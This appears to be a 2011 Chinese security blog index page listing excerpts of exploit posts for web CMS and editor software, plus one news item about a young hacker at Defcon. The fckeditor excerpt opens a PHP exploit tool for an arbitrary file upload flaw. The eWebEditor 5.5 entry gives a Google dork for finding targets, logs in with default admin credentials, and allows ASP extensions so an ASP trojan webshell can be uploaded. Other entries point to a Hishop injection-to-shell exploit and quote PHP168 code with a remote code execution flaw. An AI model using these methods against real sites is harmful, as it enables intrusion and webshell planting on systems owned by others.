fckeditor 2.6.4 任意文件上传漏洞

   
分类:安全 | 2011-08-21 | 撸过 3,963 次
1人扯蛋

描述:fckeditor
详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具!

利用:

<?
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\[......]

继续阅读

Hishop5.4和5.4.1 漏洞利用

   
分类:安全 | 2011-08-21 | 撸过 1,520 次
1人扯蛋

hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。

前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下,

这个注入点再结合iis6就能拿shell了。

前几天看到了toby57大牛dz1.5的exp, 看的我荡漾了,所以下午花了点时间,看了下PHP,学着写了个php的exp。

大牛别笑哈。。

选这种类似的URL
0.JPG
1.jpg
2.jpg

拿shell的方法上面都也说了,就不重复了。

漏洞利用下载:Hishop

eWebEditor5.5 漏洞

   
分类:安全 | 2011-08-20 | 撸过 2,385 次
0人扯蛋

作者:脚本小子

Google搜索:inurl:xxhs.asp?classid=

漏洞eWebEditor5.5

webshell方法

直接进后台eWebEditor/admin/login.asp

默认账号密码 admin admin

登陆后台点击“样式管理”

在popup样式管理

修改

路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx

图片类型比如就是我们要上传的ASP木马格式

上传路径:/

图片限制:写上1000 免的上不了我们的asp木马
上传内容不要写

然后我们就可以提交了
就可以看到样式增加成[......]

继续阅读

PHP168 V6.02 整站系统远程执行任意代码漏洞利用

   
分类:安全 | 2011-08-12 | 撸过 858 次
0人扯蛋

漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数.

inc/function.inc.php:

function get_html_url(){
global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type;
$id=$aid;
if($page<1){
$page=1;
}
$postdb[posttime]=$rsdb[posttime];

if($showHtml_Type[bencandy][$id]){
$filename_b=$showHtml_[......]

继续阅读

10岁少年女黑客发现社交网络游戏中的农场漏洞

   
分类:新闻 | 2011-08-7 | 撸过 736 次
0人扯蛋

拉斯维加斯Defcon的最新消息,一名化名为CyFi的10岁女黑客,独立安全研究人员宣告了一个iOS和Android设备上的游戏漏洞,她最早在2011年1月份发现了这些漏洞,因为她“对农场的游戏感到厌烦”,因此决定披露它。

这个漏洞可以让玩家更改作物成熟的时间,从而对游戏厂商的正常规则提出挑战。尽管多数游戏开发商会阻止这种“催熟”作物的行为,但CyFi还是表示已经发现了破解的方法。

这名年轻的黑客将因为披露该漏洞而获得来自AllClearID身份保护公司的100美元奖励。在1000人面前让一名10岁的女孩子当众发表演讲显然有难度,因此黑客大会很贴心地用10分钟长的片子来完成了这一切。
 [......]

继续阅读